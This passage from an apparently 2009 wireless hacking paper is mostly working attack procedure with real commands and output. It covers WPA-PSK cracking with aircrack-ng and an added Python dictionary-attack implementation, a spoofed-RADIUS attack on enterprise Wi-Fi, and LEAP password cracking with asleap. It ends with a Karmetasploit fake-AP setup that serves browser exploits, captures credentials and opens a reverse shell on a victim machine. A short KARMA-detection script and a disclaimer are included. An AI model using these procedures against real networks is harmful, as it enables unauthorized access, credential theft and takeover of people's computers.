KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------
From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
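What aircrack-ng -w does with the handshake, as an added example that is not part of the original paper nor aircrack-ng's code: derive the PMK from each candidate passphrase with PBKDF2-HMAC-SHA1 over the SSID, expand it to the PTK with the 802.11i PRF, and compare the HMAC it gives over EAPOL-Key message 2 with the MIC captured from the client. The handshake in sample_handshake() is constructed: the passphrase and SSID are the ones from the output above, the MACs come from the dumps in this paper, the nonces are fixed byte runs, and message 2 carries no Key Data field. The same PTK is what airdecap-ng needs in section 0x03b, which is why a capture without the handshake cannot be decrypted.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes): the expensive step per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: HMAC-SHA1 chain over 'Pairwise key expansion' and the sorted MACs and nonces."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]          # KCK = [0:16], KEK = [16:32], TK = [32:48] (CCMP)


MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the Key MIC


def eapol_mic(kck, eapol):
    """Key MIC over the whole EAPOL frame with the MIC field zeroed; algorithm chosen by Key Info bits 0-2."""
    key_info = int.from_bytes(eapol[5:7], "big")
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if key_info & 0x7 == 1:                                    # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]   # WPA2/CCMP: HMAC-SHA1-128


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Dictionary attack: recompute the MIC of message 2 for every candidate passphrase."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_msg2), captured_mic):
            return candidate
    return None


def build_msg2(snonce, key_info, kck=None):
    """Minimal EAPOL-Key message 2 (no Key Data). With a KCK the MIC is filled in as a supplicant would."""
    body = (b"\x02" + key_info.to_bytes(2, "big") + b"\x00\x10"    # descriptor type, key info, key length
            + b"\x00" * 7 + b"\x01"                                 # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # SNonce, IV, RSC, ID
            + b"\x00" * 16 + b"\x00\x00")                           # MIC placeholder, key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body      # 802.1X v1, type EAPOL-Key
    if kck is not None:
        eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return eapol


def sample_handshake():
    """Constructed capture: passphrase and SSID from this paper, made-up MACs and nonces, WPA2 key info 0x010a."""
    ssid, passphrase = "Workshop", "TheFuckinWPAKey"
    ap_mac, sta_mac = bytes.fromhex("001b2f3dcbd6"), bytes.fromhex("002127c00771")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return ssid, ap_mac, sta_mac, anonce, snonce, build_msg2(snonce, 0x010a, kck)


def run_demo():
    ssid, ap_mac, sta_mac, anonce, snonce, msg2 = sample_handshake()
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2,
                     ["password", "linksys", "TheFuckinWPAKey", "Workshop1"])


if __name__ == "__main__":
    print(run_demo())
```

Only message 2 (or message 3) of the handshake is strictly needed, since it is the first MIC computed with the fresh nonces; aircrack-ng reports "1 handshake" when it has a usable pair. The 4096 PBKDF2 rounds are the whole cost of the attack, which is why the success rate depends on the wordlist and not on how much traffic is captured.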
#############################################################
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################
Most companies have moved to 802.1x with certificate-based EAP methods (EAP-TLS, EAP-TTLS, PEAP) on their wireless networks and believe
that they are perfectly safe. A tricky hacker can still attack these systems by spoofing the server certificate.
The attack takes advantage of careless clients: many clients (or their users) accept the RADIUS server's certificate
without checking whether it is the genuine one. This lets the attacker impersonate the RADIUS server behind a rogue access point and log the
credentials of the victims; for PEAP and EAP-TTLS with MS-CHAPv2 inside, that is a challenge/response that can then be cracked offline. EAP-TLS,
where the client authenticates with its own certificate, does not leak a password this way.
We can use FreeRADIUS as the fake RADIUS server together with the WPE (Wireless Pwnage Edition) patch, which makes FreeRADIUS log the credential
information.
Additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
################################
[0x09] - Exploiting CISCO LEAP
################################
Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) is marketed as a wireless authentication process that eliminates security vulnerabilities
by supporting centralized, user-based authentication and dynamic WEP keys. Cisco LEAP is one of the extensible authentication protocol (EAP)
types usable with 802.1X.
LEAP is easy to implement and advertises compelling features such as:
- Mutual Authentication
- User-Based Authentication
- Dynamic WEP Keys
In a Wireshark capture we found that the username sent to the RADIUS server is in plaintext, while the password is never sent as such: LEAP only exchanges
an MS-CHAP-style challenge and a response computed from the NT hash of the password. That exchange can be attacked offline with a dictionary, so LEAP is vulnerable too.
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. asleap can perform:
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- De-authentication of clients on a LEAP WLAN (speeding up LEAP password recovery); AIRJACK DRIVER REQUIRED
Download here: http://asleap.sourceforge.net/
First step: use genkeys (shipped with asleap) to produce the lookup database (.dat) and index (.idx) files from a wordlist:
#./genkeys -r dict -f dict.dat -n dict.idx
dict = our wordlist/dictionary file, one word per line
dict.dat = the output password+hash file (generated by this command)
dict.idx = the output index file (generated by this command)
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
The final step in recovering our weak LEAP password is to run asleap with the newly created .dat and .idx files:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Note: the success rate depends on the dictionary size.
asleap 2.2 now includes the "-C" and "-R" options to specify the hex-delimited bytes of the challenge and the response (respectively). With these options asleap becomes a generic MS-CHAPv2 cracking tool and can be applied whenever you have an MS-CHAPv2 packet capture available.
##########################################
[0x10] - Mass Exploit with Karmetasploit
##########################################
HD Moore released documentation (http://trac.metasploit.com/wiki/Karmetasploit) on getting Karmetasploit working with the framework.
Karmetasploit launches a fake AP and exploits the clients that connect to it. The attacker can log cookies, FTP, HTTP and other credential
information from the client and can also exploit browser vulnerabilities on the client machine.
This method was tested on BackTrack 3 (Final).
1. Update Aircrack-ng
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
$ make
# make install
2. Run an aireplay-ng injection test to see whether things are working (your Wi-Fi card must support packet injection)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Injection now works!!
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download the Bash script from http://www.darkoperator.com/kmsapng.tgz
The script does the following:
- Changes the MAC address of the interface
- Sets the interface in monitor mode
- Starts the Karma AP with airbase-ng
- Changes the MTU size of the interface
- Sets the IP address
- Starts the DHCPD server
- Sets an iptables redirect of all traffic to itself, so as to bypass cached DNS entries
- Starts Metasploit
6. After that, we run kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
...
...
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\Mozilla Firefox> cd ..
D:\>net user
User accounts for \\CWH
-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CWH CWH SUPPORT_388945a0
The command completed successfully.
Enjoy the pwnage!! Oops, for pentesting :p
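From the defender's side, the distinctive trait of a KARMA-style fake AP like the one started above is that a single BSSID answers probe requests for whatever SSID a client asks for, including names it never beacons. The detection logic below is an added example (not part of kmsapng.sh or Karmetasploit) run over a constructed set of management-frame records; the BSSIDs reuse MAC addresses from the session above and the client SSIDs are made up.

```python
from collections import defaultdict

# Constructed sample of 802.11 management frames as "type,bssid,ssid" lines, the way a
# monitor-mode capture could be exported. The first BSSID is the faked AP MAC from the
# kmsapng.sh run above; the second is the CITEC AP from the injection test.
SAMPLE_FRAMES = """
probe_req,ff:ff:ff:ff:ff:ff,linksys
probe_resp,00:40:1b:5b:b0:0b,linksys
probe_req,ff:ff:ff:ff:ff:ff,HomeWiFi
probe_resp,00:40:1b:5b:b0:0b,HomeWiFi
probe_req,ff:ff:ff:ff:ff:ff,Airport_Free
probe_resp,00:40:1b:5b:b0:0b,Airport_Free
beacon,00:40:1b:5b:b0:0b,linksys
probe_req,ff:ff:ff:ff:ff:ff,CITEC
probe_resp,00:1E:58:33:83:71,CITEC
probe_resp,00:1E:58:33:83:71,CITEC
beacon,00:1E:58:33:83:71,CITEC
"""

def parse_frames(text: str) -> list:
    """Turn the CSV-style lines into (type, bssid, ssid) tuples; BSSIDs are normalised to lowercase."""
    frames = []
    for line in text.strip().splitlines():
        ftype, bssid, ssid = line.split(",", 2)
        frames.append((ftype.strip(), bssid.strip().lower(), ssid.strip()))
    return frames

def find_karma_aps(frames: list, min_ssids: int = 2) -> dict:
    """A normal AP answers probes only for SSIDs it beacons. An AP that answers probe requests
    for several SSIDs it never announces is behaving like KARMA/airbase-ng. Returns
    {bssid: sorted list of unannounced SSIDs it answered for} for every suspect."""
    beaconed = defaultdict(set)
    answered = defaultdict(set)
    for ftype, bssid, ssid in frames:
        if ftype == "beacon":
            beaconed[bssid].add(ssid)
        elif ftype == "probe_resp":
            answered[bssid].add(ssid)
    suspects = {}
    for bssid, ssids in answered.items():
        unannounced = ssids - beaconed[bssid]
        if len(unannounced) >= min_ssids:  # one stray name can be a hidden-SSID AP; several cannot
            suspects[bssid] = sorted(unannounced)
    return suspects

if __name__ == "__main__":
    print(find_karma_aps(parse_frames(SAMPLE_FRAMES)))
```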
#####################
[0x11] - References
#####################
[1] PaulDotCom Forum
[2] http://www.darkoperator.com/scripts
[3] http://trac.metasploit.com/wiki/Karmetasploit
[4] http://aircrack-ng.org/doku.php
[5] http://www.citec.us
[6] http://www.milw0rm.com
####################
[0x12] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
----------------------------------------------------
This paper is written for educational purposes only. The authors are not responsible for any damage
originating from using this paper for the wrong objective. If you want to use this knowledge on other people's systems,
you must request consent from the system owner beforehand.
----------------------------------------------------
# milw0rm.com [2009-02-24]